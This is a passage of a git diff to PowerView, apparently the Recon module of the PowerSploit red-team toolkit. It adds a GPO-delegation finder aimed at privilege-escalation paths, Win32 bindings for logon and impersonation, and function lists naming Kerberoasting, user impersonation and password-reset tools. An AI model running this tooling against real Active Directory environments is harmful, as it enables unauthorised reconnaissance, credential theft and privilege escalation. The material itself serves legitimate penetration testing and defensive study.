- $ObjectType = $Trust.PSObject.TypeNames | Where-Object {$_ -match 'PowerView'} | Select-Object -First 1
-
+ if ($Trust.SourceName -and $Trust.TargetName) {
# make sure we process the target
- $Null = $Domains.Push($TargetDomain)
-
- # build the nicely-parsable custom output object
- $DomainTrust = New-Object PSObject
- $DomainTrust | Add-Member Noteproperty 'SourceDomain' "$SourceDomain"
- $DomainTrust | Add-Member Noteproperty 'SourceSID' $Trust.SourceSID
- $DomainTrust | Add-Member Noteproperty 'TargetDomain' "$TargetDomain"
- $DomainTrust | Add-Member Noteproperty 'TargetSID' $Trust.TargetSID
- $DomainTrust | Add-Member Noteproperty 'TrustType' "$TrustType"
- $DomainTrust | Add-Member Noteproperty 'TrustDirection' "$TrustDirection"
- $DomainTrust.PSObject.TypeNames.Add($ObjectType)
- $DomainTrust
+ $Null = $Domains.Push($Trust.TargetName)
+ $Trust
}
}
}
}
catch {
- Write-Verbose "[!] Error: $_"
+ Write-Verbose "[Get-DomainTrustMapping] Error: $_"
}
}
}
}
+function Get-GPODelegation
+{
+<#
+.SYNOPSIS
+
+Finds users with write permissions on GPO objects which may allow privilege escalation within the domain.
+
+Author: Itamar Mizrahi (@MrAnde7son)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.PARAMETER GPOName
+
+The GPO display name to query for, wildcards accepted.
+
+.PARAMETER PageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.EXAMPLE
+
+Get-GPODelegation
+
+Returns all GPO delegations in current forest.
+
+.EXAMPLE
+
+Get-GPODelegation -GPOName
+
+Returns all GPO delegations on a given GPO.
+#>
+
+ [CmdletBinding()]
+ Param (
+ [String]
+ $GPOName = '*',
+
+ [ValidateRange(1,10000)]
+ [Int]
+ $PageSize = 200
+ )
+
+ $Exclusions = @("SYSTEM","Domain Admins","Enterprise Admins")
+
+ $Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
+ $DomainList = @($Forest.Domains)
+ $Domains = $DomainList | foreach { $_.GetDirectoryEntry() }
+ foreach ($Domain in $Domains) {
+ $Filter = "(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))"
+ $Searcher = New-Object System.DirectoryServices.DirectorySearcher
+ $Searcher.SearchRoot = $Domain
+ $Searcher.Filter = $Filter
+ $Searcher.PageSize = $PageSize
+ $Searcher.SearchScope = "Subtree"
+ $listGPO = $Searcher.FindAll()
+ foreach ($gpo in $listGPO){
+ $ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $Exclusions -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"}
+ if ($ACL -ne $null){
+ $GpoACL = New-Object psobject
+ $GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath
+ $GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname
+ $GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference
+ $GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights
+ $GpoACL
+ }
+ }
+ }
+}
+
+
########################################################
#
# Expose the Win32API functions and datastructures below
-# using PSReflect.
-# Warning: Once these are executed, they are baked in
+# using PSReflect.
+# Warning: Once these are executed, they are baked in
# and can't be changed while the script is running!
#
########################################################
$Mod = New-InMemoryModule -ModuleName Win32
-# all of the Win32 API functions we need
-$FunctionDefinitions = @(
- (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
- (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
- (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
- (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
- (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),
- (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),
- (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),
- (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
- (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),
- (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),
- (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),
- (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
- (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
- (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),
- (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),
- (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr]))
-)
+# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')]
+
+# used to parse the 'samAccountType' property for users/computers/groups
+$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{
+ DOMAIN_OBJECT = '0x00000000'
+ GROUP_OBJECT = '0x10000000'
+ NON_SECURITY_GROUP_OBJECT = '0x10000001'
+ ALIAS_OBJECT = '0x20000000'
+ NON_SECURITY_ALIAS_OBJECT = '0x20000001'
+ USER_OBJECT = '0x30000000'
+ MACHINE_ACCOUNT = '0x30000001'
+ TRUST_ACCOUNT = '0x30000002'
+ APP_BASIC_GROUP = '0x40000000'
+ APP_QUERY_GROUP = '0x40000001'
+ ACCOUNT_TYPE_MAX = '0x7fffffff'
+}
+
+# used to parse the 'grouptype' property for groups
+$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{
+ CREATED_BY_SYSTEM = '0x00000001'
+ GLOBAL_SCOPE = '0x00000002'
+ DOMAIN_LOCAL_SCOPE = '0x00000004'
+ UNIVERSAL_SCOPE = '0x00000008'
+ APP_BASIC = '0x00000010'
+ APP_QUERY = '0x00000020'
+ SECURITY = '0x80000000'
+} -Bitfield
+
+# used to parse the 'userAccountControl' property for users/groups
+$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{
+ SCRIPT = 1
+ ACCOUNTDISABLE = 2
+ HOMEDIR_REQUIRED = 8
+ LOCKOUT = 16
+ PASSWD_NOTREQD = 32
+ PASSWD_CANT_CHANGE = 64
+ ENCRYPTED_TEXT_PWD_ALLOWED = 128
+ TEMP_DUPLICATE_ACCOUNT = 256
+ NORMAL_ACCOUNT = 512
+ INTERDOMAIN_TRUST_ACCOUNT = 2048
+ WORKSTATION_TRUST_ACCOUNT = 4096
+ SERVER_TRUST_ACCOUNT = 8192
+ DONT_EXPIRE_PASSWORD = 65536
+ MNS_LOGON_ACCOUNT = 131072
+ SMARTCARD_REQUIRED = 262144
+ TRUSTED_FOR_DELEGATION = 524288
+ NOT_DELEGATED = 1048576
+ USE_DES_KEY_ONLY = 2097152
+ DONT_REQ_PREAUTH = 4194304
+ PASSWORD_EXPIRED = 8388608
+ TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216
+ PARTIAL_SECRETS_ACCOUNT = 67108864
+} -Bitfield
# enum used by $WTS_SESSION_INFO_1 below
$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{
@@ -13317,7 +20275,7 @@ $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{
}
# the WTSEnumerateSessionsEx result structure
-$WTS_SESSION_INFO_1 = struct $Mod WTS_SESSION_INFO_1 @{
+$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{
ExecEnvId = field 0 UInt32
State = field 1 $WTSConnectState
SessionId = field 2 UInt32
@@ -13335,26 +20293,26 @@ $WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{
}
# the NetShareEnum result structure
-$SHARE_INFO_1 = struct $Mod SHARE_INFO_1 @{
- shi1_netname = field 0 String -MarshalAs @('LPWStr')
- shi1_type = field 1 UInt32
- shi1_remark = field 2 String -MarshalAs @('LPWStr')
+$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{
+ Name = field 0 String -MarshalAs @('LPWStr')
+ Type = field 1 UInt32
+ Remark = field 2 String -MarshalAs @('LPWStr')
}
# the NetWkstaUserEnum result structure
-$WKSTA_USER_INFO_1 = struct $Mod WKSTA_USER_INFO_1 @{
- wkui1_username = field 0 String -MarshalAs @('LPWStr')
- wkui1_logon_domain = field 1 String -MarshalAs @('LPWStr')
- wkui1_oth_domains = field 2 String -MarshalAs @('LPWStr')
- wkui1_logon_server = field 3 String -MarshalAs @('LPWStr')
+$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{
+ UserName = field 0 String -MarshalAs @('LPWStr')
+ LogonDomain = field 1 String -MarshalAs @('LPWStr')
+ AuthDomains = field 2 String -MarshalAs @('LPWStr')
+ LogonServer = field 3 String -MarshalAs @('LPWStr')
}
# the NetSessionEnum result structure
-$SESSION_INFO_10 = struct $Mod SESSION_INFO_10 @{
- sesi10_cname = field 0 String -MarshalAs @('LPWStr')
- sesi10_username = field 1 String -MarshalAs @('LPWStr')
- sesi10_time = field 2 UInt32
- sesi10_idle_time = field 3 UInt32
+$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{
+ CName = field 0 String -MarshalAs @('LPWStr')
+ UserName = field 1 String -MarshalAs @('LPWStr')
+ Time = field 2 UInt32
+ IdleTime = field 3 UInt32
}
# enum used by $LOCALGROUP_MEMBERS_INFO_2 below
@@ -13370,6 +20328,12 @@ $SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{
SidTypeComputer = 9
}
+# the NetLocalGroupEnum result structure
+$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{
+ lgrpi1_name = field 0 String -MarshalAs @('LPWStr')
+ lgrpi1_comment = field 1 String -MarshalAs @('LPWStr')
+}
+
# the NetLocalGroupGetMembers result structure
$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{
lgrmi2_sid = field 0 IntPtr
@@ -13414,7 +20378,102 @@ $DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{
DomainGuid = field 7 Guid
}
+# used by WNetAddConnection2W
+$NETRESOURCEW = struct $Mod NETRESOURCEW @{
+ dwScope = field 0 UInt32
+ dwType = field 1 UInt32
+ dwDisplayType = field 2 UInt32
+ dwUsage = field 3 UInt32
+ lpLocalName = field 4 String -MarshalAs @('LPWStr')
+ lpRemoteName = field 5 String -MarshalAs @('LPWStr')
+ lpComment = field 6 String -MarshalAs @('LPWStr')
+ lpProvider = field 7 String -MarshalAs @('LPWStr')
+}
+
+# all of the Win32 API functions we need
+$FunctionDefinitions = @(
+ (func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+ (func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+ (func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+ (func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+ (func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
+ (func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),
+ (func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),
+ (func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),
+ (func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
+ (func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),
+ (func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),
+ (func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError),
+ (func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError),
+ (func advapi32 RevertToSelf ([Bool]) @() -SetLastError),
+ (func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),
+ (func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
+ (func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
+ (func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),
+ (func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),
+ (func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])),
+ (func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])),
+ (func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])),
+ (func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError)
+)
+
$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
$Netapi32 = $Types['netapi32']
$Advapi32 = $Types['advapi32']
$Wtsapi32 = $Types['wtsapi32']
+$Mpr = $Types['Mpr']
+$Kernel32 = $Types['kernel32']
+
+Set-Alias Get-IPAddress Resolve-IPAddress
+Set-Alias Convert-NameToSid ConvertTo-SID
+Set-Alias Convert-SidToName ConvertFrom-SID
+Set-Alias Request-SPNTicket Get-DomainSPNTicket
+Set-Alias Get-DNSZone Get-DomainDNSZone
+Set-Alias Get-DNSRecord Get-DomainDNSRecord
+Set-Alias Get-NetDomain Get-Domain
+Set-Alias Get-NetDomainController Get-DomainController
+Set-Alias Get-NetForest Get-Forest
+Set-Alias Get-NetForestDomain Get-ForestDomain
+Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog
+Set-Alias Get-NetUser Get-DomainUser
+Set-Alias Get-UserEvent Get-DomainUserEvent
+Set-Alias Get-NetComputer Get-DomainComputer
+Set-Alias Get-ADObject Get-DomainObject
+Set-Alias Set-ADObject Set-DomainObject
+Set-Alias Get-ObjectAcl Get-DomainObjectAcl
+Set-Alias Add-ObjectAcl Add-DomainObjectAcl
+Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl
+Set-Alias Get-GUIDMap Get-DomainGUIDMap
+Set-Alias Get-NetOU Get-DomainOU
+Set-Alias Get-NetSite Get-DomainSite
+Set-Alias Get-NetSubnet Get-DomainSubnet
+Set-Alias Get-NetGroup Get-DomainGroup
+Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup
+Set-Alias Get-NetGroupMember Get-DomainGroupMember
+Set-Alias Get-NetFileServer Get-DomainFileServer
+Set-Alias Get-DFSshare Get-DomainDFSShare
+Set-Alias Get-NetGPO Get-DomainGPO
+Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup
+Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping
+Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMapping
+Set-Alias Get-LoggedOnLocal Get-RegLoggedOn
+Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess
+Set-Alias Get-SiteName Get-NetComputerSiteName
+Set-Alias Get-Proxy Get-WMIRegProxy
+Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn
+Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection
+Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive
+Set-Alias Get-NetProcess Get-WMIProcess
+Set-Alias Invoke-ThreadedFunction New-ThreadedFunction
+Set-Alias Invoke-UserHunter Find-DomainUserLocation
+Set-Alias Invoke-ProcessHunter Find-DomainProcess
+Set-Alias Invoke-EventHunter Find-DomainUserEvent
+Set-Alias Invoke-ShareFinder Find-DomainShare
+Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile
+Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember
+Set-Alias Get-NetDomainTrust Get-DomainTrust
+Set-Alias Get-NetForestTrust Get-ForestTrust
+Set-Alias Find-ForeignUser Get-DomainForeignUser
+Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember
+Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping
+Set-Alias Get-DomainPolicy Get-DomainPolicyData
diff --git a/Recon/README.md b/Recon/README.md
index 6e28a30..7fcacc5 100644
--- a/Recon/README.md
+++ b/Recon/README.md
@@ -34,96 +34,93 @@ an array of hosts from the pipeline.
### Misc Functions:
Export-PowerViewCSV - thread-safe CSV append
- Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit)
- Copy-ClonedFile - copies a local file to a remote location, matching MAC properties
- Get-IPAddress - resolves a hostname to an IP
- Test-Server - tests connectivity to a specified server
- Convert-NameToSid - converts a given user/group name to a security identifier (SID)
- Convert-SidToName - converts a security identifier (SID) to a group/user name
- Convert-NT4toCanonical - converts a user/group NT4 name (i.e. dev/john) to canonical format
- Get-Proxy - enumerates local proxy settings
+ Resolve-IPAddress - resolves a hostname to an IP
+ ConvertTo-SID - converts a given user/group name to a security identifier (SID)
+ Convert-ADName - converts object names between a variety of formats
+ ConvertFrom-UACValue - converts a UAC int value to human readable form
+ Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object
+ Remove-RemoteConnection - destroys a connection created by New-RemoteConnection
+ Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token
+ Invoke-RevertToSelf - reverts any token impersonation
+ Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN)
+ Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes
Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
- Get-UserProperty - returns all properties specified for users, or a set of user:prop names
- Get-ComputerProperty - returns all properties specified for computers, or a set of computer:prop names
- Find-InterestingFile - search a local or remote path for files with specific terms in the name
- Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
- Get-DomainSearcher - builds a proper ADSI searcher object for a given domain
- Get-ObjectAcl - returns the ACLs associated with a specific active directory object
- Add-ObjectAcl - adds an ACL to a specified active directory object
- Get-LastLoggedOn - return the last logged on user for a target host
- Get-CachedRDPConnection - queries all saved RDP connection entries on a target host
- Invoke-ACLScanner - enumerate -1000+ modifable ACLs on a specified domain
- Get-GUIDMap - returns a hash table of current GUIDs -> display names
- Get-DomainSID - return the SID for the specified domain
- Invoke-ThreadedFunction - helper that wraps threaded invocation for other functions
-
-
-### net * Functions:
- Get-NetDomain - gets the name of the current user's domain
- Get-NetForest - gets the forest associated with the current user's domain
- Get-NetForestDomain - gets all domains for the current forest
- Get-NetDomainController - gets the domain controllers for the current computer's domain
- Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
- Add-NetUser - adds a local or domain user
- Get-NetComputer - gets a list of all current servers in the domain
- Get-NetPrinter - gets an array of all current computers objects in a domain
- Get-NetOU - gets data for domain organization units
- Get-NetSite - gets current sites in a domain
- Get-NetSubnet - gets registered subnets for a domain
- Get-NetGroup - gets a list of all current groups in a domain
- Get-NetGroupMember - gets a list of all current users in a specified domain group
- Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
- Add-NetGroupUser - adds a local or domain user to a local or domain group
- Get-NetFileServer - get a list of file servers used by current domain users
- Get-DFSshare - gets a list of all distribute file system shares on a domain
- Get-NetShare - gets share information for a specified server
- Get-NetLoggedon - gets users actively logged onto a specified server
- Get-NetSession - gets active sessions on a specified server
- Get-NetRDPSession - gets active RDP sessions for a specified server (like qwinsta)
- Get-NetProcess - gets the remote processes and owners on a remote server
- Get-UserEvent - returns logon or TGT events from the event log for a specified host
- Get-ADObject - takes a domain SID and returns the user, group, or computer
- object associated with it
- Set-ADObject - takes a SID, name, or SamAccountName to query for a specified
- domain object, and then sets a specified 'PropertyName' to a
- specified 'PropertyValue'
+
+
+### Domain/LDAP Functions:
+ Get-DomainDNSZone - enumerates the Active Directory DNS zones for a given domain
+ Get-DomainDNSRecord - enumerates the Active Directory DNS records for a given zone
+ Get-Domain - returns the domain object for the current (or specified) domain
+ Get-DomainController - return the domain controllers for the current (or specified) domain
+ Get-Forest - returns the forest object for the current (or specified) forest
+ Get-ForestDomain - return all domains for the current (or specified) forest
+ Get-ForestGlobalCatalog - return all global catalogs for the current (or specified) forest
+ Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set
+ Get-DomainUser - return all users or specific user objects in AD
+ New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object
+ Set-DomainUserPassword - sets the password for a given user identity and returns the user object
+ Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events
+ Get-DomainComputer - returns all computers or specific computer objects in AD
+ Get-DomainObject - returns all (or specified) domain objects in AD
+ Set-DomainObject - modifies a gven property for a specified active directory object
+ Get-DomainObjectAcl - returns the ACLs associated with a specific active directory object
+ Add-DomainObjectAcl - adds an ACL for a specific active directory object
+ Find-InterestingDomainAcl - finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects
+ Get-DomainOU - search for all organization units (OUs) or specific OU objects in AD
+ Get-DomainSite - search for all sites or specific site objects in AD
+ Get-DomainSubnet - search for all subnets or specific subnets objects in AD
+ Get-DomainSID - returns the SID for the current domain or the specified domain
+ Get-DomainGroup - return all groups or specific group objects in AD
+ New-DomainGroup - creates a new domain group (assuming appropriate permissions) and returns the group object
+ Get-DomainManagedSecurityGroup - returns all security groups in the current (or target) domain that have a manager set
+ Get-DomainGroupMember - return the members of a specific domain group
+ Add-DomainGroupMember - adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so
+ Get-DomainFileServer - returns a list of servers likely functioning as file servers
+ Get-DomainDFSShare - returns a list of all fault-tolerant distributed file systems for the current (or specified) domain
### GPO functions
- Get-GptTmpl - parses a GptTmpl.inf to a custom object
- Get-NetGPO - gets all current GPOs for a given domain
- Get-NetGPOGroup - gets all GPOs in a domain that set "Restricted Groups"
- on on target machines
- Find-GPOLocation - takes a user/group and makes machines they have effective
- rights over through GPO enumeration and correlation
- Find-GPOComputerAdmin - takes a computer and determines who has admin rights over it
- through GPO enumeration
- Get-DomainPolicy - returns the default domain or DC policy
+ Get-DomainGPO - returns all GPOs or specific GPO objects in AD
+ Get-DomainGPOLocalGroup - returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences
+ Get-DomainGPOUserLocalGroupMapping - enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation
+ Get-DomainGPOComputerLocalGroupMapping - takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation
+ Get-DomainPolicy - returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller
-### User-Hunting Functions:
- Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
- Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
- Invoke-ProcessHunter - hunts for processes with a specific name or owned by a specific user on domain machines
- Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
+### Computer Enumeration Functions
+
+ Get-NetLocalGroup - enumerates the local groups on the local (or remote) machine
+ Get-NetLocalGroupMember - enumerates members of a specific local group on the local (or remote) machine
+ Get-NetShare - returns open shares on the local (or a remote) machine
+ Get-NetLoggedon - returns users logged on the local (or a remote) machine
+ Get-NetSession - returns session information for the local (or a remote) machine
+ Get-RegLoggedOn - returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys
+ Get-NetRDPSession - returns remote desktop/session information for the local (or a remote) machine
+ Test-AdminAccess - rests if the current user has administrative access to the local (or a remote) machine
+ Get-NetComputerSiteName - returns the AD site where the local (or a remote) machine resides
+ Get-WMIRegProxy - enumerates the proxy server and WPAD conents for the current user
+ Get-WMIRegLastLoggedOn - returns the last user who logged onto the local (or a remote) machine
+ Get-WMIRegCachedRDPConnection - returns information about RDP connections outgoing from the local (or remote) machine
+ Get-WMIRegMountedDrive - returns information about saved network mounted drives for the local (or remote) machine
+ Get-WMIProcess - returns a list of processes and their owners on the local or remote machine
+ Find-InterestingFile - searches for files on the given path that match a series of specified criteria
-### Domain Trust Functions:
- Get-NetDomainTrust - gets all trusts for the current user's domain
- Get-NetForestTrust - gets all trusts for the forest associated with the current user's domain
- Find-ForeignUser - enumerates users who are in groups outside of their principal domain
- Find-ForeignGroup - enumerates all the members of a domain's groups and finds users that are outside of the queried domain
- Invoke-MapDomainTrust - try to build a relational mapping of all domain trusts
-
-
-### MetaFunctions:
- Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
- Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
- Find-LocalAdminAccess - finds machines on the domain that the current user has local admin access to
- Find-ManagedSecurityGroups - searches for active directory security groups which are managed and identify users who have write access to
- - those groups (i.e. the ability to add or remove members)
- Find-UserField - searches a user field for a particular term
- Find-ComputerField - searches a computer field for a particular term
- Get-ExploitableSystem - finds systems likely vulnerable to common exploits
- Invoke-EnumerateLocalAdmin - enumerates members of the local Administrators groups across all machines in the domain
+### Threaded 'Meta'-Functions
+
+ Find-DomainUserLocation - finds domain machines where specific users are logged into
+ Find-DomainProcess - finds domain machines where specific processes are currently running
+ Find-DomainUserEvent - finds logon events on the current (or remote domain) for the specified users
+ Find-DomainShare - finds reachable shares on domain machines
+ Find-InterestingDomainShareFile - searches for files matching specific criteria on readable shares in the domain
+ Find-LocalAdminAccess - finds machines on the local domain where the current user has local administrator access
+ Find-DomainLocalGroupMember - enumerates the members of specified local group on machines in the domain
+
+
+### Domain Trust Functions:
+ Get-DomainTrust - returns all domain trusts for the current domain or a specified domain
+ Get-ForestTrust - returns all forest trusts for the current forest or a specified forest
+ Get-DomainForeignUser - enumerates users who are in groups outside of the user's domain
+ Get-DomainForeignGroupMember - enumerates groups with users outside of the group's domain and returns each foreign member
+ Get-DomainTrustMapping - this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1
index a170218..d0a4148 100644
--- a/Recon/Recon.psd1
+++ b/Recon/Recon.psd1
@@ -23,83 +23,85 @@ PowerShellVersion = '2.0'
# Functions to export from this module
FunctionsToExport = @(
- 'Add-NetGroupUser',
- 'Add-NetUser',
- 'Add-ObjectAcl',
- 'Convert-NameToSid',
- 'Convert-SidToName',
+ 'Export-PowerViewCSV',
+ 'Resolve-IPAddress',
+ 'ConvertTo-SID',
+ 'ConvertFrom-SID',
'Convert-ADName',
'ConvertFrom-UACValue',
- 'Export-PowerViewCSV',
- 'Find-ComputerField',
- 'Find-ForeignGroup',
- 'Find-ForeignUser',
- 'Find-GPOComputerAdmin',
- 'Find-GPOLocation',
- 'Find-InterestingFile',
- 'Find-LocalAdminAccess',
- 'Find-ManagedSecurityGroups',
- 'Find-UserField',
- 'Get-ADObject',
- 'Get-CachedRDPConnection',
- 'Get-ComputerDetails',
- 'Get-ComputerProperty',
- 'Get-DFSshare',
- 'Get-DNSRecord',
- 'Get-DNSZone',
- 'Get-DomainPolicy',
+ 'Add-RemoteConnection',
+ 'Remove-RemoteConnection',
+ 'Invoke-UserImpersonation',
+ 'Invoke-RevertToSelf',
+ 'Get-DomainSPNTicket',
+ 'Invoke-Kerberoast',
+ 'Get-PathAcl',
+ 'Get-DomainDNSZone',
+ 'Get-DomainDNSRecord',
+ 'Get-Domain',
+ 'Get-DomainController',
+ 'Get-Forest',
+ 'Get-ForestDomain',
+ 'Get-ForestGlobalCatalog',
+ 'Find-DomainObjectPropertyOutlier',
+ 'Get-DomainUser',
+ 'New-DomainUser',
+ 'Set-DomainUserPassword',
+ 'Get-DomainUserEvent',
+ 'Get-DomainComputer',
+ 'Get-DomainObject',
+ 'Set-DomainObject',
+ 'Set-DomainObjectOwner',
+ 'Get-DomainObjectAcl',
+ 'Add-DomainObjectAcl',
+ 'Find-InterestingDomainAcl',
+ 'Get-DomainOU',
+ 'Get-DomainSite',
+ 'Get-DomainSubnet',
'Get-DomainSID',
- 'Get-ExploitableSystem',
- 'Get-GUIDMap',
- 'Get-HttpStatus',
- 'Get-IPAddress',
- 'Get-LastLoggedOn',
- 'Get-LoggedOnLocal',
- 'Get-NetComputer',
- 'Get-NetDomain',
- 'Get-NetDomainController',
- 'Get-NetDomainTrust',
- 'Get-NetFileServer',
- 'Get-NetForest',
- 'Get-NetForestCatalog',
- 'Get-NetForestDomain',
- 'Get-NetForestTrust',
- 'Get-NetGPO',
- 'Get-NetGPOGroup',
